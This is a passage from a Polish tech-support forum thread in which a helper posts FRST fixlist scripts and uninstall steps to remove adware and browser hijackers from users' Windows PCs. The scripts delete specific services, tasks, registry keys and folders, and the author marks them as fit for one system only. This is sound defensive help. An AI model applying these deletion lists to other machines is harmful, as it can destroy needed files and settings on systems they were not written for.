picasso

Problem braku sieci to skutek niepoprawej próby usunięcia "YouTube Accelerator" - usunięto z dysku plik, który był wpięty w łańcuch Winsock. Skutki: uszkodzony Winsock. Winsock: Catalog9 01 C:\Program Files (x86)\YouTube Accelerator\ytalsp.dll File Not found () Winsock: Catalog9 02 C:\Program Files (x86)\YouTube Accelerator\ytalsp.dll File Not found () Winsock: Catalog9 03 C:\Program Files (x86)\YouTube Accelerator\ytalsp.dll File Not found () Winsock: Catalog9 04 C:\Program Files (x86)\YouTube Accelerator\ytalsp.dll File Not found () Winsock: Catalog9 05 C:\Program Files (x86)\YouTube Accelerator\ytalsp.dll File Not found () Winsock: Catalog9 06 C:\Program Files (x86)\YouTube Accelerator\ytalsp.dll File Not found () Winsock: Catalog9 07 C:\Program Files (x86)\YouTube Accelerator\ytalsp.dll File Not found () Winsock: Catalog9 08 C:\Program Files (x86)\YouTube Accelerator\ytalsp.dll File Not found () Winsock: Catalog9 09 C:\Program Files (x86)\YouTube Accelerator\ytalsp.dll File Not found () Winsock: Catalog9 10 C:\Program Files (x86)\YouTube Accelerator\ytalsp.dll File Not found () Winsock: Catalog9 11 C:\Program Files (x86)\YouTube Accelerator\ytalsp.dll File Not found () Winsock: Catalog9 23 C:\Program Files (x86)\YouTube Accelerator\ytalsp.dll File Not found () 1. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: S2 globalUpdate; C:\Program Files (x86)\globalUpdate\Update\GoogleUpdate.exe [68608 2015-02-12] (globalUpdate) [File not signed] S3 globalUpdatem; C:\Program Files (x86)\globalUpdate\Update\GoogleUpdate.exe [68608 2015-02-12] (globalUpdate) [File not signed] R2 IHProtect Service; C:\Program Files (x86)\XTab\ProtectService.exe [158896 2015-01-16] (XTab system) R2 SPDRIVER_1501.0.0.0; C:\Program Files (x86)\ShopperPro\JSDriver\1501.0.0.0\jsdrv.sys [52584 2015-02-27] () R2 YouTubeAcceleratorService; C:\Program Files (x86)\YouTube Accelerator\YouTubeAcceleratorService.exe [1510248 2015-02-12] (GOOBZO) R4 GUBootStartup; \??\C:\Windows\System32\drivers\GUBootStartup.sys [X] Task: {00CE9143-56D6-46B6-B278-326111FC439D} - System32\Tasks\{23D1FE0F-AE38-44F6-A780-E3303909F8D8} => pcalua.exe -a "C:\Program Files (x86)\YouTube Accelerator\YTAUninstall.exe" Task: {0B838895-1D6F-4511-B1F4-5D4474D121CB} - System32\Tasks\d495a1a5-2910-4445-9452-0fa90678852b-11 => C:\Program Files (x86)\SensePlus\d495a1a5-2910-4445-9452-0fa90678852b-11.exe Task: {223B3252-6AF4-4E39-ACF7-77053C953383} - System32\Tasks\globalUpdateUpdateTaskMachineUA => C:\Program Files (x86)\globalUpdate\Update\GoogleUpdate.exe [2015-02-12] (globalUpdate) Task: {2B568104-4279-4435-AA08-503C122C8214} - System32\Tasks\globalUpdateUpdateTaskMachineCore => C:\Program Files (x86)\globalUpdate\Update\GoogleUpdate.exe [2015-02-12] (globalUpdate) Task: {37D497B3-D19A-4515-8EB5-DC4377FAD64B} - System32\Tasks\UNELEVATE_9778 => C:\Program Files (x86)\ShopperPro\JSDriver\1501.0.0.0\jsdrv.exe [2015-02-27] () Task: {45DF4740-6125-426B-B23F-7581CFB9614A} - System32\Tasks\c21c6fb6-3e79-48f1-87c5-b8b648d5faf9-11 => C:\Program Files (x86)\iWebar\c21c6fb6-3e79-48f1-87c5-b8b648d5faf9-11.exe Task: {46CAFD29-FA9D-48A2-A18B-D2F88E811924} - System32\Tasks\d495a1a5-2910-4445-9452-0fa90678852b-7 => C:\Program Files (x86)\SensePlus\d495a1a5-2910-4445-9452-0fa90678852b-7.exe Task: {55DE4861-669E-4FFD-A7D3-DD3951998893} - System32\Tasks\SPBIW_UpdateTask_Time_313731313739363233342d5a556c6c4a5a575750414134 => Wscript.exe //B "C:\ProgramData\ShopperPro\spbihe.js" spbiu.exe /invoke /f:check_services /l:0 Task: {57C2F0A6-0744-40C1-AE6E-733772E35359} - System32\Tasks\c21c6fb6-3e79-48f1-87c5-b8b648d5faf9-7 => C:\Program Files (x86)\iWebar\c21c6fb6-3e79-48f1-87c5-b8b648d5faf9-7.exe Task: {5B830A62-16C5-486D-94C5-1C008F2BC1AB} - System32\Tasks\YTAUpdate_logon => C:\Program Task: {68150F0D-870C-47D3-890F-B7F8D1352D73} - System32\Tasks\ShopperPro => C:\Program Files (x86)\ShopperPro\ShopperPro.exe [2015-02-27] (Goobzo LTD) Task: {6A8F3860-D66A-4541-8619-A57084BC5DF1} - System32\Tasks\YTAHelper => C:\Program Files (x86)\YTAHelper\YTAHelper.exe Task: {6E769582-34F0-4698-B866-36E37A737A6F} - System32\Tasks\c21c6fb6-3e79-48f1-87c5-b8b648d5faf9-1-6 => C:\Program Files (x86)\iWebar\c21c6fb6-3e79-48f1-87c5-b8b648d5faf9-1-6.exe Task: {83E44F6A-C74D-4C2A-A286-3FA2A55A1168} - System32\Tasks\d495a1a5-2910-4445-9452-0fa90678852b-1-6 => C:\Program Files (x86)\SensePlus\d495a1a5-2910-4445-9452-0fa90678852b-1-6.exe Task: {8A07C8A2-9742-43E6-9269-6CCF19D695DA} - System32\Tasks\SPDriver => C:\Program Files (x86)\ShopperPro\JSDriver\1501.0.0.0\jsdrv.exe [2015-02-27] () Task: {9E8FB32B-F1CA-4ADE-9C62-4D3F3B4262A7} - System32\Tasks\c21c6fb6-3e79-48f1-87c5-b8b648d5faf9-4 => C:\Program Files (x86)\iWebar\c21c6fb6-3e79-48f1-87c5-b8b648d5faf9-4.exe Task: {A03FC3A9-DA31-4784-BD39-AEEB5FD60AAC} - System32\Tasks\ZJDZSSU => C:\Users\Samsung\AppData\Roaming\ZJDZSSU.exe Task: {ABEAEE0A-B7CC-4708-86BD-B0D224FA8209} - System32\Tasks\ShopperProJSUpd => C:\Program Files (x86)\ShopperPro\updater.exe [2015-02-27] (Goobzo) Task: {B4EA139B-26EB-478C-8E4B-A3C76F134284} - System32\Tasks\d495a1a5-2910-4445-9452-0fa90678852b-4 => C:\Program Files (x86)\SensePlus\d495a1a5-2910-4445-9452-0fa90678852b-4.exe Task: {BD03365C-603B-48D9-A675-2431A91671C6} - System32\Tasks\YTAUpdate => C:\Program Task: {BE678C65-FC21-4EC6-BCBE-4DD3B6AF1687} - System32\Tasks\c21c6fb6-3e79-48f1-87c5-b8b648d5faf9-5 => C:\Program Files (x86)\iWebar\c21c6fb6-3e79-48f1-87c5-b8b648d5faf9-5.exe Task: {C4D9EBBF-BB31-4601-A1A9-91C4EF42CACF} - System32\Tasks\c21c6fb6-3e79-48f1-87c5-b8b648d5faf9-5_user => C:\Program Files (x86)\iWebar\c21c6fb6-3e79-48f1-87c5-b8b648d5faf9-5.exe Task: {EDFFD5AF-E6C8-4900-8A77-26958362A137} - System32\Tasks\c21c6fb6-3e79-48f1-87c5-b8b648d5faf9-6 => C:\Program Files (x86)\iWebar\c21c6fb6-3e79-48f1-87c5-b8b648d5faf9-6.exe Task: {F3DCF8B0-9BAB-4785-B367-F14998C3DA79} - System32\Tasks\LGXGTRI => C:\Users\Samsung\AppData\Roaming\LGXGTRI.exe Task: {F68262FE-440E-4CF0-B86C-0ED365A34DC7} - System32\Tasks\{D7351ADF-794C-4455-8AB5-217308A0C56D} => pcalua.exe -a C:\Users\Samsung\AppData\Roaming\mystartsearch\UninstallManager.exe -c -ptid=smt Task: {F8DE7E25-0E3D-419E-9019-C646535F5D5A} - System32\Tasks\d495a1a5-2910-4445-9452-0fa90678852b-6 => C:\Program Files (x86)\SensePlus\d495a1a5-2910-4445-9452-0fa90678852b-6.exe Task: {FA31A5CC-F1B9-4C85-B4DC-68D7062AC1A2} - System32\Tasks\d495a1a5-2910-4445-9452-0fa90678852b-5 => C:\Program Files (x86)\SensePlus\d495a1a5-2910-4445-9452-0fa90678852b-5.exe Task: {FBBE12C2-1ACF-46C4-B4DF-457C2314DFD7} - System32\Tasks\d495a1a5-2910-4445-9452-0fa90678852b-5_user => C:\Program Files (x86)\SensePlus\d495a1a5-2910-4445-9452-0fa90678852b-5.exe Task: {FDCA3B55-25B3-42F3-80B0-3C75DE967320} - System32\Tasks\d495a1a5-2910-4445-9452-0fa90678852b-1-7 => C:\Program Files (x86)\SensePlus\d495a1a5-2910-4445-9452-0fa90678852b-1-7.exe Task: {FF690562-7F74-4F20-A975-6140B2D9A8FA} - System32\Tasks\c21c6fb6-3e79-48f1-87c5-b8b648d5faf9-1-7 => C:\Program Files (x86)\iWebar\c21c6fb6-3e79-48f1-87c5-b8b648d5faf9-1-7.exe Task: C:\Windows\Tasks\c21c6fb6-3e79-48f1-87c5-b8b648d5faf9-1-6.job => C:\Program Files (x86)\iWebar\c21c6fb6-3e79-48f1-87c5-b8b648d5faf9-1-6.exe Task: C:\Windows\Tasks\c21c6fb6-3e79-48f1-87c5-b8b648d5faf9-1-7.job => C:\Program Files (x86)\iWebar\c21c6fb6-3e79-48f1-87c5-b8b648d5faf9-1-7.exe Task: C:\Windows\Tasks\c21c6fb6-3e79-48f1-87c5-b8b648d5faf9-11.job => C:\Program Files (x86)\iWebar\c21c6fb6-3e79-48f1-87c5-b8b648d5faf9-11.exe Task: C:\Windows\Tasks\c21c6fb6-3e79-48f1-87c5-b8b648d5faf9-4.job => C:\Program Files (x86)\iWebar\c21c6fb6-3e79-48f1-87c5-b8b648d5faf9-4.exe Task: C:\Windows\Tasks\c21c6fb6-3e79-48f1-87c5-b8b648d5faf9-5.job => C:\Program Files (x86)\iWebar\c21c6fb6-3e79-48f1-87c5-b8b648d5faf9-5.exe Task: C:\Windows\Tasks\c21c6fb6-3e79-48f1-87c5-b8b648d5faf9-5_user.job => C:\Program Files (x86)\iWebar\c21c6fb6-3e79-48f1-87c5-b8b648d5faf9-5.exe Task: C:\Windows\Tasks\c21c6fb6-3e79-48f1-87c5-b8b648d5faf9-6.job => C:\Program Files (x86)\iWebar\c21c6fb6-3e79-48f1-87c5-b8b648d5faf9-6.exe Task: C:\Windows\Tasks\c21c6fb6-3e79-48f1-87c5-b8b648d5faf9-7.job => C:\Program Files (x86)\iWebar\c21c6fb6-3e79-48f1-87c5-b8b648d5faf9-7.exe Task: C:\Windows\Tasks\d495a1a5-2910-4445-9452-0fa90678852b-1-6.job => C:\Program Files (x86)\SensePlus\d495a1a5-2910-4445-9452-0fa90678852b-1-6.exe Task: C:\Windows\Tasks\d495a1a5-2910-4445-9452-0fa90678852b-1-7.job => C:\Program Files (x86)\SensePlus\d495a1a5-2910-4445-9452-0fa90678852b-1-7.exe Task: C:\Windows\Tasks\d495a1a5-2910-4445-9452-0fa90678852b-11.job => C:\Program Files (x86)\SensePlus\d495a1a5-2910-4445-9452-0fa90678852b-11.exe Task: C:\Windows\Tasks\d495a1a5-2910-4445-9452-0fa90678852b-4.job => C:\Program Files (x86)\SensePlus\d495a1a5-2910-4445-9452-0fa90678852b-4.exe Task: C:\Windows\Tasks\d495a1a5-2910-4445-9452-0fa90678852b-5.job => C:\Program Files (x86)\SensePlus\d495a1a5-2910-4445-9452-0fa90678852b-5.exe Task: C:\Windows\Tasks\d495a1a5-2910-4445-9452-0fa90678852b-5_user.job => C:\Program Files (x86)\SensePlus\d495a1a5-2910-4445-9452-0fa90678852b-5.exe Task: C:\Windows\Tasks\d495a1a5-2910-4445-9452-0fa90678852b-6.job => C:\Program Files (x86)\SensePlus\d495a1a5-2910-4445-9452-0fa90678852b-6.exe Task: C:\Windows\Tasks\d495a1a5-2910-4445-9452-0fa90678852b-7.job => C:\Program Files (x86)\SensePlus\d495a1a5-2910-4445-9452-0fa90678852b-7.exe Task: C:\Windows\Tasks\globalUpdateUpdateTaskMachineCore.job => C:\Program Files (x86)\globalUpdate\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\globalUpdateUpdateTaskMachineUA.job => C:\Program Files (x86)\globalUpdate\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\LGXGTRI.job => C:\Users\Samsung\AppData\Roaming\LGXGTRI.exe Task: C:\Windows\Tasks\ZJDZSSU.job => C:\Users\Samsung\AppData\Roaming\ZJDZSSU.exe HKLM-x32\...\Run: [sPDriver] => C:\Program Files (x86)\ShopperPro\JSDriver\1501.0.0.0\jsdrv.exe [3224576 2015-02-27] () HKU\S-1-5-21-2139329922-3582906400-648950646-1000\...\Run: [AVG-Secure-Search-Update_0614i] => C:\Users\Samsung\AppData\Roaming\Avg_Update_0614i\AVG-Secure-Search-Update_0614i.exe /PROMPT /mid=121d34194f4a47d2b2bcd16ff0331473-5b96fcc5a9e0febf72a66af30b8d73181ebf1606 /CMPID=0614i HKU\S-1-5-21-2139329922-3582906400-648950646-1000\...\Run: [sPDriver] => C:\Program Files (x86)\ShopperPro\JSDriver\1501.0.0.0\jsdrv.exe [3224576 2015-02-27] () HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.mystartsearch.com/?type=hppp&ts=1423739854&from=smt&uid=ST160LT015-1AE141_W1901JXJXXXXW1901JXJ HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = http://www.mystartsearch.com/?type=hppp&ts=1423739854&from=smt&uid=ST160LT015-1AE141_W1901JXJXXXXW1901JXJ HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.mystartsearch.com/web/?type=ds&ts=1423739800&from=smt&uid=ST160LT015-1AE141_W1901JXJXXXXW1901JXJ&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = http://www.mystartsearch.com/web/?type=ds&ts=1423739800&from=smt&uid=ST160LT015-1AE141_W1901JXJXXXXW1901JXJ&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.mystartsearch.com/?type=hppp&ts=1423739854&from=smt&uid=ST160LT015-1AE141_W1901JXJXXXXW1901JXJ HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.mystartsearch.com/?type=hppp&ts=1423739854&from=smt&uid=ST160LT015-1AE141_W1901JXJXXXXW1901JXJ HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.mystartsearch.com/web/?type=ds&ts=1423739800&from=smt&uid=ST160LT015-1AE141_W1901JXJXXXXW1901JXJ&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.mystartsearch.com/web/?type=ds&ts=1423739800&from=smt&uid=ST160LT015-1AE141_W1901JXJXXXXW1901JXJ&q={searchTerms} HKU\S-1-5-21-2139329922-3582906400-648950646-1000\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.mystartsearch.com/web/?type=dspp&ts=1423739854&from=smt&uid=ST160LT015-1AE141_W1901JXJXXXXW1901JXJ&q={searchTerms} HKU\S-1-5-21-2139329922-3582906400-648950646-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.mystartsearch.com/?type=hppp&ts=1423739854&from=smt&uid=ST160LT015-1AE141_W1901JXJXXXXW1901JXJ HKU\S-1-5-21-2139329922-3582906400-648950646-1000\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.mystartsearch.com/web/?type=dspp&ts=1423739854&from=smt&uid=ST160LT015-1AE141_W1901JXJXXXXW1901JXJ&q={searchTerms} SearchScopes: HKU\S-1-5-21-2139329922-3582906400-648950646-1000 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://www.mystartsearch.com/web/?type=dspp&ts=1423739854&from=smt&uid=ST160LT015-1AE141_W1901JXJXXXXW1901JXJ&q={searchTerms} SearchScopes: HKU\S-1-5-21-2139329922-3582906400-648950646-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.mystartsearch.com/web/?utm_source=b&utm_medium=smt&utm_campaign=install_ie&utm_content=ds&from=smt&uid=ST160LT015-1AE141_W1901JXJXXXXW1901JXJ&ts=1423739948&type=default&q={searchTerms} SearchScopes: HKU\S-1-5-21-2139329922-3582906400-648950646-1000 -> {2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0} URL = http://www.mystartsearch.com/web/?utm_source=b&utm_medium=smt&utm_campaign=install_ie&utm_content=ds&from=smt&uid=ST160LT015-1AE141_W1901JXJXXXXW1901JXJ&ts=1423739948&type=default&q={searchTerms} SearchScopes: HKU\S-1-5-21-2139329922-3582906400-648950646-1000 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://www.mystartsearch.com/web/?type=dspp&ts=1423739854&from=smt&uid=ST160LT015-1AE141_W1901JXJXXXXW1901JXJ&q={searchTerms} SearchScopes: HKU\S-1-5-21-2139329922-3582906400-648950646-1000 -> {E733165D-CBCF-4FDA-883E-ADEF965B476C} URL = http://www.mystartsearch.com/web/?utm_source=b&utm_medium=smt&utm_campaign=install_ie&utm_content=ds&from=smt&uid=ST160LT015-1AE141_W1901JXJXXXXW1901JXJ&ts=1423739948&type=default&q={searchTerms} BHO: Shopper Pro -> {A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C} -> C:\ProgramData\ShopperPro\ShopperPro64.dll [2015-02-27] (Goobzo Ltd.) BHO-x32: IETabPage Class -> {3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C} -> C:\Program Files (x86)\XTab\SupTab.dll [2015-01-16] (Thinknice Co. Limited) BHO-x32: Shopper Pro -> {A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C} -> C:\ProgramData\ShopperPro\ShopperPro.dll [2015-02-27] (Goobzo Ltd.) BHO-x32: PriceFountain -> {b608cc98-54de-4775-96c9-097de398500c} -> C:\Users\Samsung\AppData\Local\PriceFountain\PriceFountainIE.dll [2015-01-11] () BHO-x32: No Name -> {FCE3FA8B-BA81-467C-81D8-E43C00D1BC71} -> No File StartMenuInternet: IEXPLORE.EXE - C:\Program Files\Internet Explorer\iexplore.exe http://www.mystartsearch.com/?type=sc&ts=1423739800&from=smt&uid=ST160LT015-1AE141_W1901JXJXXXXW1901JXJ FF Plugin-x32: @staging.google.com/globalUpdate Update;version=10 -> C:\Program Files (x86)\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll [2015-02-12] (globalUpdate) FF Plugin-x32: @staging.google.com/globalUpdate Update;version=4 -> C:\Program Files (x86)\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll [2015-02-12] (globalUpdate) FF HKLM-x32\...\Firefox\Extensions: [fftoolbar2014@etech.com] - C:\Users\Samsung\AppData\Roaming\Mozilla\Firefox\Profiles\q994nzu3.default\extensions\fftoolbar2014@etech.com CHR HomePage: Default -> hxxp://www.mystartsearch.com/?type=hppp&ts=1423739854&from=smt&uid=ST160LT015-1AE141_W1901JXJXXXXW1901JXJ CHR StartupUrls: Default -> "hxxp://www.mystartsearch.com/?type=hppp&ts=1423739854&from=smt&uid=ST160LT015-1AE141_W1901JXJXXXXW1901JXJ" CHR DefaultSearchKeyword: Default -> mystartsearch C:\Program Files (x86)\23af37cf-7ebb-43b3-abee-ab37a958f983 C:\Program Files (x86)\35337f0e-62ee-49a9-9540-47759e3302f2 C:\Program Files (x86)\globalUpdate C:\Program Files (x86)\iWebar C:\Program Files (x86)\SensePlus C:\Program Files (x86)\ShopperPro C:\Program Files (x86)\XTab C:\Program Files (x86)\YTAHelper C:\Program Files (x86)\YouTube Accelerator C:\Program Files\Common Files\ShopperPro C:\ProgramData\Avg_Update_0215tb C:\ProgramData\ShopperPro C:\ProgramData\TEMP C:\ProgramData\YTAHelper C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Electronic Arts Inc C:\ProgramData\Microsoft\Windows\Start Menu\Programs\YouTube Accelerator C:\Users\Samsung\AppData\Local\Google\Chrome\User Data\Default\Preferences C:\Users\Samsung\AppData\Local\PriceFountain C:\Users\Samsung\AppData\Roaming\LGXGTRI C:\Users\Samsung\AppData\Roaming\ZJDZSSU C:\Users\Samsung\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\PriceFountain Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ShopperPro /f Reg: reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\YouTube Accelerator" /f CMD: netsh winsock reset EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. W Google Chrome: Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Zresetuj ustawienia przeglądarki. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Wyszukiwanie > klik w Zarządzanie wyszukiwarkami > skasuj z listy mystartsearch oraz inne niedomyślne śmieci (o ile będą). Zresetuj cache wtyczek. W pasku adresów wpisz chrome://plugins i ENTER. Na liście wtyczek wybierz dowolną i kliknij Wyłącz. Następnie wtyczkę ponownie Włącz. 3. W Operze: na liście Rozszerzeń odmontuj adware iWebar, SensePlus. 4. Napraw uszkodzony specjalny skrót IE. W pasku eksploratora wklej poniższą ścieżkę i ENTER: C:\Users\Samsung\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools Prawoklik na zlokalizowany tam skrót Internet explorer (bez dodatków) > Właściwości > w polu Element docelowy po ścieżce "C:\Program Files\Internet Explorer\iexplore.exe" dopisz dwie spacje i -extoff 5. Zrób nowy log FRST z opcji Scan, zaznacz ponownie pole Addition. Dołącz też plik fixlog.txt.

Jest tu ogromna ilość instalacji adware. Rozpoczniemy od deinstalacji, potem będą poprawki. Akcje wstępne: 1. Przez Panel sterowania odinstaluj: - Adware/PUP: Advanced System Protector, Amazon Browser Bar, Amazon Browser Settings, AnyProtect, BlockAndSurf, Context2pro, fst_it_148, fst_it_84, iLivid, iRobinHood Partners Addon, KingBrowse, Lollipop, Movie Mode, Movies Toolbar for Chrome (Dist. by Bandoo Media, Inc.), Movies Toolbar for Internet Explorer (Dist. by Bandoo Media, Inc.), MyPC Backup, Mysearchdial, PC Speed Maximizer v3.2, Plus-HD-9.1, Pokki, PricePeep, RegClean Pro, Rising Cities, SaveSense, SaveSense (remove only), Search Protect, Softonic toolbar on IE and Chrome, SoftwareUpdater, Torch, VO Package, WPM17.8.0.3442. - Stare wersje: Adobe Reader X (10.1.0) - Italiano, Java 7 Update 51. 2. Zrób nowy log FRST z opcji Scan, zaznacz ponownie pola Addition i Shortcut.

Jest tu o wiele więcej instalacji adware. Poza tym, jest tu wiele kont i mam silne wątpliwości na którym był reset Google Chrome. Działania do wykonania: 1. Przez Panel sterowania odinstaluj: - Adware/PUP: BetterPRicECheC, GetDiscountApp, GGOsiavenowe, GS_Sustainer 1.80, LuuckyCOuppON, NexetCoup, Tiny Download Manager (remove only). - Stare wersje i zbędniki: Adobe Flash Player 15 ActiveX, Adobe Flash Player 15 Plugin, Java 8 Update 25, McAfee Security Scan Plus. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: R1 {825c5be7-672f-4c14-9929-48a3a5e1a660}w64; C:\Windows\System32\drivers\{825c5be7-672f-4c14-9929-48a3a5e1a660}w64.sys [44736 2014-09-16] (StdLib) R1 {8aa67d0b-c01c-4d37-acff-fff3e85a7686}w64; C:\Windows\System32\drivers\{8aa67d0b-c01c-4d37-acff-fff3e85a7686}w64.sys [48832 2014-11-27] (StdLib) R1 {8ce1c375-1e13-43f7-a4fd-6530f47c4fde}Gw64; C:\Windows\System32\drivers\{8ce1c375-1e13-43f7-a4fd-6530f47c4fde}Gw64.sys [61120 2014-05-22] (StdLib) R1 {e4c6b00c-d06e-4877-9f09-d92a224047b5}w64; C:\Windows\System32\drivers\{e4c6b00c-d06e-4877-9f09-d92a224047b5}w64.sys [48832 2014-11-29] (StdLib) R1 {eb5ff5f5-0862-4d0e-b77f-65f32d94e6ab}w64; C:\Windows\System32\drivers\{eb5ff5f5-0862-4d0e-b77f-65f32d94e6ab}w64.sys [48832 2014-11-28] (StdLib) R2 BackupStack; C:\Program Files (x86)\MyPC Backup\BackupStack.exe [36936 2014-09-18] (Just Develop It) R2 MaintainerSvc3.36.5835263; C:\ProgramData\253696b0-e9b9-4e71-87e6-dd3f97c02b2a\maintainer.exe [123680 2015-03-09] () R2 Update Rock Turner; C:\Program Files (x86)\Rock Turner\updateRockTurner.exe [414496 2015-03-09] () R2 Util Rock Turner; C:\Program Files (x86)\Rock Turner\bin\utilRockTurner.exe [414496 2015-03-09] () S2 4d349a54; "C:\Windows\system32\rundll32.exe" "c:\progra~2\gs_boo~1\AssistantSvc.dll",service S4 nvlddmkm; system32\DRIVERS\nvlddmkm.sys [X] S4 nvvad_WaveExtensible; system32\drivers\nvvad64v.sys [X] Task: {3FC5BF0E-BEA0-4E80-B3AE-5F119EDFD676} - System32\Tasks\Optimizer Pro Schedule => C:\Program Files (x86)\Optimizer Pro\OptProLauncher.exe Task: {5354A3F1-15BC-4211-9FE3-859E1B241B78} - System32\Tasks\PennyBee => C:\Users\adrian\AppData\Roaming\PennyBee\UPDATE~1\UPDATE~1.EXE Task: {751AF918-0C37-4F68-8D3B-F04952019101} - System32\Tasks\LaunchSignup => C:\Program Files (x86)\MyPC Backup\Signup Wizard.exe Task: {8C8A77AB-CE33-4AC3-B660-6893BE90088D} - System32\Tasks\{93CA2A29-2E54-449C-873E-2E933F16AF85} => C:\Users\Dawid\Desktop\KN Launcher.exe Task: {AD099B6B-1D6F-4B2D-AB88-7418521D9846} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe Task: {E1D9682E-4CDD-4ABD-9CE5-E2AFE59783A7} - System32\Tasks\{084981AD-B84C-451A-BFE3-7E236ADB5347} => C:\Users\adrian\Desktop\jxpiinstall.exe Task: {E7D3CF05-20C4-4FF5-91A3-C09147D5BB9C} - System32\Tasks\{C0E4C093-96E9-43CA-8E3A-DD35C57F55D5} => C:\Users\adrian\Desktop\Java-SE(13186)-dp.exe Task: C:\Windows\Tasks\PennyBee.job => C:\Users\adrian\AppData\Roaming\PennyBee\UPDATE~1\UPDATE~1.EXE AppInit_DLLs-x32: c:\progra~2\gs_boo~1\assist~1.dll => "c:\progra~2\gs_boo~1\assist~1.dll" File Not Found Startup: C:\Users\Dawid\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPC Backup.lnk ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => No File GroupPolicy: Group Policy on Chrome detected CHR HKLM\SOFTWARE\Policies\Google: Policy restriction CHR RestoreOnStartup: Default -> "hxxp://rts.dsrlte.com?affID=pr_9c463e7f-5d65-4289-b233-694661020215" ShortcutWithArgument: C:\Users\Dawid\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://istart.webssearches.com/?type=sc&ts=1410268049&from=wpc&uid=MaxtorX6E030L0_E12HLVDE ShortcutWithArgument: C:\Users\Dawid\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://istart.webssearches.com/?type=sc&ts=1410268049&from=wpc&uid=MaxtorX6E030L0_E12HLVDE ShortcutWithArgument: C:\Users\Dawid\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://istart.webssearches.com/?type=sc&ts=1410268049&from=wpc&uid=MaxtorX6E030L0_E12HLVDE ShortcutWithArgument: C:\Users\Dawid\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://istart.webssearches.com/?type=sc&ts=1410268049&from=wpc&uid=MaxtorX6E030L0_E12HLVDE ShortcutWithArgument: C:\Users\Dawid\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://istart.webssearches.com/?type=sc&ts=1410268049&from=wpc&uid=MaxtorX6E030L0_E12HLVDE HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://istart.webssearches.com/?type=hp&ts=1410268049&from=wpc&uid=MaxtorX6E030L0_E12HLVDE HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = http://istart.webssearches.com/?type=hp&ts=1410268049&from=wpc&uid=MaxtorX6E030L0_E12HLVDE HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://istart.webssearches.com/web/?type=ds&ts=1410268049&from=wpc&uid=MaxtorX6E030L0_E12HLVDE&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = http://istart.webssearches.com/web/?type=ds&ts=1410268049&from=wpc&uid=MaxtorX6E030L0_E12HLVDE&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://istart.webssearches.com/?type=hp&ts=1410268049&from=wpc&uid=MaxtorX6E030L0_E12HLVDE HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = http://istart.webssearches.com/?type=hp&ts=1410268049&from=wpc&uid=MaxtorX6E030L0_E12HLVDE HKLM\Software\Microsoft\Internet 